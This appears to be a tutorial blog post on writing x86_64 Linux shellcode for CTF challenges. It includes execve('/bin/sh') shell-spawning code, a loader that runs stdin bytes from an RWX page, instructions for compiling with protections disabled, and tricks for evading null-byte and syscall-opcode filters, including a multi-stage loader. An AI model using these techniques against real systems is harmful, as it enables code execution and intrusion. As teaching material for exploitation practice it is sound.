I trust that whoever is reading this article is not a layman: you are probably familiar with CTFs, have overflowed a buffer and smashed the stack at least once, and know what you are getting yourself into. I assume you know what a CTF challenge is, the basics of x86 assembly, and how to use Linux.
The term “shellcode” originates from the common objective of an exploit, which is usually to execute a command shell such as /bin/sh. The code is written in assembly language.
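# execve("/bin/sh", {NULL}, {NULL})
.intel_syntax noprefix
.text
.global _start
_start:
    mov rax, 0x68732f6e69622f   # "/bin/sh\0" as a little-endian qword
    push rax
    push rsp
    pop rdi                     # rdi = pointer to "/bin/sh"
    xor eax, eax
    push rax                    # push a NULL qword
    mov al, 59                  # rax = 59 (execve)
    push rsp
    pop rdx                     # rdx = envp = {NULL}
    push rsp
    pop rsi                     # rsi = argv = {NULL}
    syscall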
Looking at this code for the first time is intimidating and scary, but once you learn how to read it, writing the shellcode becomes the easiest part of the job.
How does it execute
Shellcode is simply executable bytes: machine instructions assembled to perform a small task once control flow is hijacked.
Today's computers follow one of two designs: the Von Neumann architecture, which stores code and data in the same memory and so treats code as data, and the Harvard architecture, which stores code and data separately.
Almost all general-purpose architectures (x86, ARM, MIPS, etc.) are Von Neumann, and they are the focus of this article.
To start out, we will use a simple shellcode loader to test and execute our shellcode.
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h> // for read()

int main(void) {
    // 1. Allocate an executable memory page.
    // PROT_READ | PROT_WRITE | PROT_EXEC: The memory can be read, written to, and executed.
    // MAP_PRIVATE | MAP_ANON: The mapping is private to this process and not backed by a file.
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);

    if (page == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }

    printf("[+] Memory allocated at: %p\n", page);

    // 2. Read shellcode from standard input (stdin) into the allocated page.
    printf("[+] Reading shellcode from stdin...\n");
    ssize_t bytes_read = read(STDIN_FILENO, page, 4095);

    if (bytes_read <= 0) {
        perror("read failed or no input provided");
        return 1;
    }

    // %zd is the matching format specifier for ssize_t.
    printf("[+] Read %zd bytes. Executing now...\n", bytes_read);

    // 3. Create a function pointer to the page and call it.
    // This transfers execution to the shellcode.
    void (*shellcode_func)(void) = (void (*)(void))page;
    shellcode_func();

    // This line will likely not be reached if the shellcode exits.
    return 0;
}
Shellcode is just bytes. If you want to execute it, those bytes must live in memory marked as executable.
The mmap call is important. If we requested memory without PROT_EXEC, then the moment the program tried to execute the code at page, the CPU’s memory management unit would see the “No-Execute” permission on that memory page and trigger a protection fault, resulting in a SIGSEGV.
We are asking for a single page (0x1000 bytes) of memory that is:
- Writable: we load shellcode bytes into it using read.
- Executable: the CPU will happily jmp into it without complaining.
void *page = mmap(
    NULL,                               // Let the kernel choose the address
    4096,                               // One page = 4096 bytes (common page size)
    PROT_READ | PROT_WRITE | PROT_EXEC, // Permissions: read, write, execute
    MAP_PRIVATE | MAP_ANON,             // Private mapping, not backed by a file
    -1,                                 // File descriptor (-1 since it's anonymous)
    0                                   // Offset (not used here)
);
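The loader is not compiled with the default gcc configuration. By default, modern compilers enable protections that get in the way of shellcode, so you need to disable them when compiling the program: -fno-stack-protector turns off stack canaries, -z execstack marks the stack as executable, and -no-pie -fno-pie disable position-independent executables.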
gcc -ggdb -g3 execute.c -fno-stack-protector -z execstack -no-pie -fno-pie -o execute
Using checksec, we see Stack: Executable. That means data on the stack can be treated as code.
$ pwn checksec --file=execute
[*] '/tmp/test/execute'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
Writing Shellcode
Before I start writing shellcode, I open loads of documentation: syscall tables and the manual for whatever architecture I am targeting. To mention a few, I use Systrack's Linux kernel syscall tables for system call lookups, and Felix Cloutier’s x86 and amd64 instruction reference. It is easier to navigate, but the official Intel manual also works.
When writing shellcode, your goal is to execute syscalls (system calls). They are the special functions your program uses to talk to the kernel.
- read: ask the kernel to read from a file.
- write: ask the kernel to write to a file.
- execve: ask the kernel to run another program.
- exit: tell the kernel you’re done and exit cleanly.
Syscalls are functions and, like any other function, they take parameters. It is not as easy as function(arg1, arg2, arg3), but you learn to do it.
Syscall calling convention for the x86 and x86_64 architectures (the first register holds the syscall number going in and the return value coming out):
ARCH | NR / RETURN | ARG0 | ARG1 | ARG2 | ARG3 | ARG4 | ARG5 |
---|---|---|---|---|---|---|---|
x86 | eax | ebx | ecx | edx | esi | edi | ebp |
x64 | rax | rdi | rsi | rdx | r10 | r8 | r9 |
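As a rough sketch, the table above can be turned into a lookup that tells you which register each syscall argument belongs in. The helper name `syscall_registers` and the dictionary layout are made up for illustration; they are not part of any library.

```python
# Register order for Linux syscalls, copied from the table above.
# The first entry holds the syscall number (and later the return value).
SYSCALL_REGS = {
    "x86": ["eax", "ebx", "ecx", "edx", "esi", "edi", "ebp"],
    "x64": ["rax", "rdi", "rsi", "rdx", "r10", "r8", "r9"],
}


def syscall_registers(arch, number, *args):
    """Map a syscall number and its arguments onto registers (hypothetical helper)."""
    regs = SYSCALL_REGS[arch]
    if len(args) > len(regs) - 1:
        raise ValueError("a syscall takes at most 6 arguments")
    values = (number,) + args
    return dict(zip(regs, values))


# exit(0) on x86_64: syscall number 60, status 0
print(syscall_registers("x64", 60, 0))
```

Writing the register plan down like this before touching assembly makes it harder to mix up the x86 and x86_64 orders.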
To write shellcode, you look up the number of the syscall you want. The simplest example is the exit() syscall. Looking it up in a man page, you find this definition:
exit - cause normal process termination
#include <stdlib.h>
[[noreturn]] void exit(int status);
It takes only one parameter, the exit status. On Unix-like systems, a successful exit is exit(0), so let's write that in shellcode. Never mind the first three lines; they matter to the assembler, not to us in this case.
.intel_syntax noprefix

.global _start

_start:
    mov rax, 60     # syscall number for exit
                    # rdi (the status) is never set here. It happens to be 0
                    # when this standalone ELF starts; in injected shellcode,
                    # set it yourself first (e.g. xor edi, edi).
    syscall         # invoke the syscall
Assemble the shellcode with the following command.
gcc -nostdlib -static hello.S -o hello.elf
This creates an ELF file. Inspect it and view the disassembly with objdump.
$ objdump -d -Mintel hello.elf
hello.elf: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <_start>:
401000: 48 c7 c0 3c 00 00 00 mov rax,0x3c
401007: 0f 05 syscall
We only want the .text section of the ELF file. To extract it, use objcopy.
objcopy --dump-section .text=hello.bin hello.elf
Use xxd to view the extracted bytes. They should match the bytes in the objdump listing.
$ xxd hello.bin
00000000: 48c7 c03c 0000 000f 05                   H..<.....
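If you would rather stay in Python, a sketch like the one below turns raw machine code into the escaped form you can paste into an exploit script. The bytes are the ones from the objdump listing of hello.elf; `to_escaped` is a made-up helper name.

```python
def to_escaped(code: bytes) -> str:
    """Format raw machine code as a \\xNN string (hypothetical helper)."""
    return "".join(f"\\x{b:02x}" for b in code)


# mov rax, 0x3c ; syscall  (bytes taken from the objdump output)
hello = bytes.fromhex("48c7c03c000000" "0f05")

print(len(hello), "bytes")
print(to_escaped(hello))
```

In practice you would load the bytes with `open("hello.bin", "rb").read()` instead of typing them in.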
You can run the ELF file just like any other Linux program. It exits with status 0. To check the status, run echo $?.
./hello.elf
echo $?
# 0
For more detail, use strace to see the syscalls being executed.
strace ./hello.elf
# execve("./hello.elf", ["./hello.elf"], 0x7ffe3fbd8560 /* 73 vars */) = 0
# exit(0) = ?
# +++ exited with 0 +++
Enough with the long introduction, let's get into the notes.
Problems you would run into when writing shellcode
Here are some of the common problems you will eventually run into when writing shellcode.
Size constraints (Byte budget hell)
Your goal is to use as few bytes as possible.
XOR Instruction
Be careful not to overuse mov. To zero out a register, do not use mov; use xor instead.
mov al, 0x0     # b0 00
mov ax, 0x0     # 66 b8 00 00
mov eax, 0x0    # b8 00 00 00 00
mov rax, 0x0    # 48 c7 c0 00 00 00 00

xor al, al      # 30 c0
xor ax, ax      # 66 31 c0
xor eax, eax    # 31 c0 (also clears the upper 32 bits of rax)
xor rax, rax    # 48 31 c0
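To make the comparison concrete, here is a small sketch that tabulates the encodings from the listing above by size and flags the ones containing a null byte. The dictionary simply restates the listing; `summarize` is an illustrative name.

```python
# Encodings copied from the listing above: instruction -> machine code
ZEROING = {
    "mov al, 0": "b0 00",
    "mov ax, 0": "66 b8 00 00",
    "mov eax, 0": "b8 00 00 00 00",
    "mov rax, 0": "48 c7 c0 00 00 00 00",
    "xor al, al": "30 c0",
    "xor ax, ax": "66 31 c0",
    "xor eax, eax": "31 c0",
    "xor rax, rax": "48 31 c0",
}


def summarize(encodings):
    """Return (instruction, size, has_null_byte) rows, smallest first."""
    rows = []
    for insn, hexbytes in encodings.items():
        code = bytes.fromhex(hexbytes)
        rows.append((insn, len(code), b"\x00" in code))
    return sorted(rows, key=lambda row: row[1])


for insn, size, has_null in summarize(ZEROING):
    print(f"{insn:<14} {size} bytes  null byte: {has_null}")
```

Every mov form carries at least one null byte, while none of the xor forms do, which matters again in the input filtering notes.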
Push Pop
push a value onto the stack, then get it back into a register with pop. The pair is often shorter than the equivalent mov.
# 7 bytes
mov rax, 0xbadc0de   # 48 c7 c0 de c0 ad 0b

# 6 bytes
push 0xbadc0de       # 68 de c0 ad 0b
pop rax              # 58
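The saving gets bigger for small values, because push also has a one-byte immediate form. The sketch below encodes `push imm` by hand, assuming the standard x86-64 opcodes (6a for a sign-extended 8-bit immediate, 68 for a sign-extended 32-bit one). `push_imm` is a hypothetical helper, not a pwntools function.

```python
import struct


def push_imm(value: int) -> bytes:
    """Encode `push imm` for x86-64 (sketch; the immediate is sign-extended to 64 bits)."""
    if -0x80 <= value <= 0x7F:
        return b"\x6a" + struct.pack("<b", value)   # push imm8, 2 bytes
    if -0x80000000 <= value <= 0x7FFFFFFF:
        return b"\x68" + struct.pack("<i", value)   # push imm32, 5 bytes
    raise ValueError("value does not fit in a sign-extended 32-bit immediate")


POP_RAX = b"\x58"

code = push_imm(0xBADC0DE) + POP_RAX
print(code.hex(" "), f"({len(code)} bytes)")

small = push_imm(59) + POP_RAX   # rax = 59 (execve)
print(small.hex(" "), f"({len(small)} bytes)")
```

Setting a syscall number this way costs three bytes, against seven for `mov rax, 59`.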
Use what you have
When you hijack the control flow of the program (e.g. through jmp rax), some registers may already hold useful values. For example, if you are about to call the read syscall and rdx already holds a non-zero value, use it as-is for the count parameter. It depends on the situation, but you get the point.
Strings
If you think strings are hard in C, well, let me introduce you to x86_64.
I will use the open syscall as an example.
# open("/flag", O_RDONLY)
mov rbx, 0x67616c662f   # "/flag" as a little-endian qword
push rbx                # push the filename onto the stack
mov rax, 2              # open() syscall
mov rdi, rsp            # point to the first item on the stack ("/flag")
mov rsi, 0              # second arg: flags = O_RDONLY (0)
syscall                 # open("/flag", O_RDONLY)
The value 0x67616c662f is /flag in little endian. To reproduce it, run the following command.
echo -ne "/flag" | rev | xxd -p
# 67616c662f
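The same conversion can be done in Python in both directions, which is handy for checking a constant you found in someone else's shellcode. The two function names are illustrative only.

```python
def string_to_imm(s: bytes) -> int:
    """Pack up to 8 bytes into the integer that stores them in order in memory."""
    if len(s) > 8:
        raise ValueError("a 64-bit register holds at most 8 bytes")
    return int.from_bytes(s, "little")


def imm_to_string(value: int) -> bytes:
    """Inverse: show the 8 bytes a 64-bit immediate puts in memory."""
    return value.to_bytes(8, "little")


print(hex(string_to_imm(b"/flag")))        # the constant used for open()
print(imm_to_string(0x68732F6E69622F))     # the constant from the execve example
```

The unused high bytes of the register come out as zeros, which is what terminates the string for free once the value is pushed.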
The downside is that you will struggle with long strings, as they may not fit in a register. Another way is to use labels. I prefer this way, but it may not always work: the string has to travel with the shellcode, and a short forward rip-relative displacement is encoded with null bytes.
# open("/flag", O_RDONLY)
push 2
pop rax                 # open syscall = 2

lea rdi, [rip+flag]     # rdi = address of the flag string
xor rsi, rsi            # O_RDONLY = 0

syscall

flag:
    .string "/flag"
There is also building the string on the stack. It almost always works, but it requires a lot of work.
# open("/flag", O_RDONLY)
# push "flag" little endian to stack
push 0x67616C66
pop rax                 # rax = 0x0000000067616C66

# shift left 8 bits to make room for the '/' byte
shl rax, 8              # rax = 0x00000067616C6600
# load '/' (0x2F) into rbx using push/pop
push 0x2F
pop rbx                 # rbx = 0x...0000002F

# OR the '/' into the low byte
or rax, rbx             # rax = 0x00000067616C662F
# push the 64-bit qword (stack gets "/flag\0\0\0" in little-endian)
push rax

push 2                  # open syscall
pop rax

lea rdi, [rsp]          # filename = "/flag"
xor rsi, rsi            # flags = O_RDONLY

syscall
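For strings longer than eight bytes, the tedious part is splitting them into qwords and pushing them in the right order. A minimal sketch of that bookkeeping follows; the path `/home/user/flag.txt` is just an example, and `stack_qwords` is a hypothetical helper.

```python
def stack_qwords(s: bytes) -> list:
    """Split a string into 64-bit immediates, in the order they must be pushed."""
    s = s + b"\x00"                              # C strings need a terminator
    s = s.ljust(-(-len(s) // 8) * 8, b"\x00")    # pad to a multiple of 8 bytes
    chunks = [s[i:i + 8] for i in range(0, len(s), 8)]
    # The stack grows down, so the last chunk is pushed first.
    return [int.from_bytes(c, "little") for c in reversed(chunks)]


for q in stack_qwords(b"/home/user/flag.txt"):
    print(f"mov rax, {q:#018x}")
    print("push rax")
```

After the last push, rsp points at the start of the string. Note that the padded chunk still assembles to null bytes, so under a null-byte filter you would combine this with the shifting trick described further down.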
Input filtering
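The input may be manipulated or have some bytes filtered out before execution.
String termination & null bytes (\x00)
Functions that treat the input as a C string stop copying at the first \x00, so shellcode delivered that way must not contain null bytes. One great resource I found is nets.ec/Shellcode/Null-free, which has many great examples.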
- Use the xor instruction instead of mov. This uses fewer bytes and does not include null bytes.
# bad
mov rax, 0

# good
xor rax, rax
- Use push and pop instructions instead of mov.
push 0x70
pop rax
syscall
- Use shifting instructions.
mov rdi, 0x68732f6e69622f6a   # 64-bit immediate; in memory it reads "j/bin/sh"
shr rdi, 8                    # drop the filler byte 'j'; the top byte becomes 0x00, the terminator
push rdi                      # the stack now holds "/bin/sh\0"
push rsp                      # push the current RSP (stack pointer)
pop rdi                       # RDI now points at the pushed string
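Before sending anything, it helps to scan the assembled bytes for whatever the target filters. The sketch below does that for null bytes by default. The machine code is hand-assembled from the snippets above, so treat the hex strings as assumptions to double-check with objdump.

```python
def find_bad_bytes(code: bytes, bad: bytes = b"\x00") -> list:
    """Return (offset, byte) pairs for every forbidden byte in the shellcode."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


mov_zero = bytes.fromhex("48c7c000000000")    # mov rax, 0
xor_zero = bytes.fromhex("4831c0")            # xor rax, rax
# mov rdi, 0x68732f6e69622f6a ; shr rdi, 8
shift_trick = bytes.fromhex("48bf6a2f62696e2f7368" "48c1ef08")

print(find_bad_bytes(mov_zero))
print(find_bad_bytes(xor_zero))
print(find_bad_bytes(shift_trick))

# The shift produces the terminator at runtime instead of in the payload.
print((0x68732F6E69622F6A >> 8).to_bytes(8, "little"))
```

Passing a different `bad` set, for example `b"\x0f\x05"`, checks for other filtered bytes one at a time rather than as a sequence.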
Self modifying shellcode
One time I was solving a CTF challenge that filtered the syscall bytes 0F 05. I wrote shellcode that constructs the syscall bytes 0F 05 at runtime so they would not be filtered. The following code increments the byte 0E by 1 so that it becomes 0F, which bypasses the filter. This only works when the shellcode sits in writable memory.
inc BYTE PTR [rip]
.byte 0x0e, 0x05
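What happens here can be simulated without running anything. The sketch assumes `inc BYTE PTR [rip]` assembles to `fe 05 00 00 00 00` (a rip-relative operand with a zero 32-bit displacement), and models the filter as a plain substring check, which may differ from what a real challenge does.

```python
# Hand-assembled bytes for the snippet above (an assumption worth checking
# with objdump): inc BYTE PTR [rip+0], followed by the two data bytes.
stub = bytearray.fromhex("fe0500000000" "0e05")


def passes_filter(code: bytes) -> bool:
    """Model a filter that rejects the syscall opcode 0f 05."""
    return b"\x0f\x05" not in code


print("stub passes filter:", passes_filter(stub))

# What the CPU does at runtime: [rip] points just past the 6-byte inc
# instruction, i.e. at the 0x0e byte, which gets incremented in place.
patched = bytearray(stub)
patched[6] = (patched[6] + 1) & 0xFF

print(patched[6:].hex(" "))
```

The zero displacement puts four null bytes in the stub, so this form would not survive a null-byte filter as well.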
NOP Padding
nop is an instruction that does nothing. It is useful for padding, alignment, or similar purposes.
.global _start

_start:
    # Your code here
    nop
    nop
    #...
    nop

    .fill 10, 1, 0x90   # 10 NOP instructions
    # or
    .rept 10
    nop
    .endr

    # More code here
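When the payload is built in an exploit script rather than in the assembler, the same padding can be applied to the raw bytes. This is a minimal sketch; `pad_with_nops` and its `sled_first` flag are made-up names.

```python
NOP = b"\x90"


def pad_with_nops(code: bytes, size: int, sled_first: bool = False) -> bytes:
    """Pad shellcode to exactly `size` bytes with NOPs (hypothetical helper)."""
    if len(code) > size:
        raise ValueError(f"shellcode is {len(code)} bytes, budget is {size}")
    padding = NOP * (size - len(code))
    return padding + code if sled_first else code + padding


exit_code = bytes.fromhex("48c7c03c0000000f05")   # mov rax, 60 ; syscall
padded = pad_with_nops(exit_code, 16, sled_first=True)
print(padded.hex(" "))
```

Putting the NOPs first gives a sled that tolerates an imprecise jump target; putting them last just fills a fixed-size buffer.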
Multi stage shellcode
Sometimes the input filtering makes it impossible to write shellcode that does anything meaningful. One way around this is multi-stage shellcode: write a stage 1 “loader” whose only job is to read in and run another shellcode. Only stage 1 gets filtered.
push 0
push 0
pop rax     # read syscall
pop rdi     # stdin

push rsp
pop rsi     # rsi = rsp (buffer)

push 100
pop rdx     # count = 100 bytes

syscall

jmp rsp     # jump to the stage 2 bytes that were just read
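The two stages have different constraints: stage 1 must survive the filter, while stage 2 only has to fit in the 100 bytes the loader reads. The sketch below checks both. The loader bytes are hand-assembled from the listing above and should be verified with objdump, and `check_stages` is a hypothetical helper.

```python
# Hand-assembled bytes of the loader above (verify with objdump before use).
STAGE1 = bytes.fromhex(
    "6a00"   # push 0
    "6a00"   # push 0
    "58"     # pop rax   -> read syscall (0)
    "5f"     # pop rdi   -> stdin (0)
    "54"     # push rsp
    "5e"     # pop rsi   -> buffer = rsp
    "6a64"   # push 100
    "5a"     # pop rdx   -> count = 100
    "0f05"   # syscall
    "ffe4"   # jmp rsp
)
STAGE2_MAX = 100  # the count passed to read() in rdx


def check_stages(stage1: bytes, stage2: bytes, filtered: bytes) -> None:
    """Only stage 1 passes through the filter; stage 2 just has to fit."""
    hits = [hex(b) for b in stage1 if b in filtered]
    if hits:
        raise ValueError(f"stage 1 contains filtered bytes: {hits}")
    if len(stage2) > STAGE2_MAX:
        raise ValueError(f"stage 2 is {len(stage2)} bytes, loader reads {STAGE2_MAX}")


print(len(STAGE1), "bytes in stage 1")
check_stages(STAGE1, b"\x90" * 64, filtered=b"\x3b")
```

With `filtered=b"\x00"` the check fails, because `push 0` assembles to `6a 00`; under a null-byte filter the loader would need `xor eax, eax` style zeroing instead.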
Use Pwntools when possible
It has lots of functions that automate and ease the process of writing shellcode. Sometimes you don’t need to write shellcode at all; it does it for you. But first you have to understand how the magic works, or you will waste a lot of time. RTFM.
Pwn shellcraft
pwn shellcraft -l                       # List shellcodes
pwn shellcraft -l amd                   # Shellcodes with amd in the name
pwn shellcraft -f hex amd64.linux.sh    # Print the shellcode as hex
pwn shellcraft -r amd64.linux.sh        # Run to test. Get shell
Pwn template
I like to use the pwn template command to generate a starting point for my challenges. Then I use the asm("") function to write the shellcode, instead of compiling it and passing it through the shell by hand.
stage1 = asm("""# shellcode loader""")
stage2 = asm("""# actual shellcode""")

io.sendline(stage1)
pause(1)                # give the loader a moment to reach its read()
io.sendline(stage2)

io.interactive()
GDB Debugger
Using a debugger is essential. gdb is good but lacks features, which is why I recommend using pwndbg or gef with it. They help with visualisation and provide functions that are useful for debugging.
gdbscript = f'''

# break points
#...

source /opt/gef/gef.py
continue
'''
References
- https://shell-storm.org/shellcode/index.html
- https://pwn.college/program-security/program-security/
- https://www.felixcloutier.com/x86/
- https://syscalls.mebeim.net/?table=x86/64/x64/latest
- https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86
- https://nets.ec/Shellcode/Null-free
- https://book.hacktricks.wiki/en/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html